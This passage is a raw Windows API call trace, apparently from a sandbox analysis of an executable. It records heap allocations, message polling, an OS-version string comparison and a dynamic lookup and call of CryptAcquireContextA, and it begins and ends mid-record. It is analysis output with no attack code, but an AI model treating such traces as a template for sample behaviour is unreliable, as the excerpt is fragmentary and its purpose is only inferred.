hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0187.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0187.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0187.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0187.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0187.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0187.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0187.898] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0187.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0187.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0187.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0187.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0187.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0187.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0187.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416270 [0187.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0187.898] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0187.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0187.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0187.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6a0 [0187.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0187.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0187.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acde0 [0187.898] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0187.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0187.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0187.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0187.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0187.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0187.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0187.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0187.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0187.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0187.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0187.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0187.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0187.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0187.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0187.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0187.899] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0187.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0187.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0187.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0187.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0187.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0187.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0187.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0187.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0187.900] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0187.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0187.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0187.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0187.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0187.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0187.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0187.900] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0187.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0187.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0187.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aca50 [0187.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0187.900] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0187.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0187.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0187.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0187.900] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0187.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0187.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0187.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0187.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0187.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0187.901] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0187.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0187.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0187.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0187.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0187.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0187.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0187.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0187.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0187.901] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0187.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0187.901] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0187.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0187.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0187.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0187.901] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0187.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0187.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0187.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0187.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0187.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0187.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0187.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0187.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0187.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0187.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0187.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0187.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0187.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0187.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0187.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0187.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0187.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0187.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0187.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0187.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0187.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0187.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0187.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0187.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0187.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0187.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0187.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0187.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0187.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0187.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0187.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0187.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0187.903] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0187.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0187.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0187.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0187.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0187.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0187.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0187.904] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0187.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0187.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0187.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0187.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0187.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0187.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0187.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0187.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0187.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0187.904] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0187.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0187.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0187.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0187.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0187.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0187.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0187.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0187.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0187.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0187.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0187.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0187.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0187.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0187.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0187.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0187.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466d90, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0187.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0187.905] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0187.906] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0187.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0187.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0187.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0187.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466d90, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0187.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0187.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0187.906] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0187.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0187.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0187.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36f8 | out: hHeap=0x25c0000) returned 1 [0187.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0187.906] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0187.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0187.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0187.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0187.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0187.907] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0187.907] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xaad240) returned 1 [0187.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0187.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0187.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0187.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0187.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0187.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0187.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0187.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0187.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0187.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0187.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0187.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0187.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0187.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0187.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0187.908] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0187.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0187.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0187.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0187.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0187.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0187.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0187.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0187.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0187.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0187.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0187.909] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0187.909] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0187.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0187.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0187.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0187.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0187.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0187.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0187.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0187.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0187.909] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0187.910] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0187.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0187.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0187.910] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0187.910] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0187.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0187.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0187.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0187.910] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0187.910] RtlAllocateHeap (HeapHandle=0x25c0000, 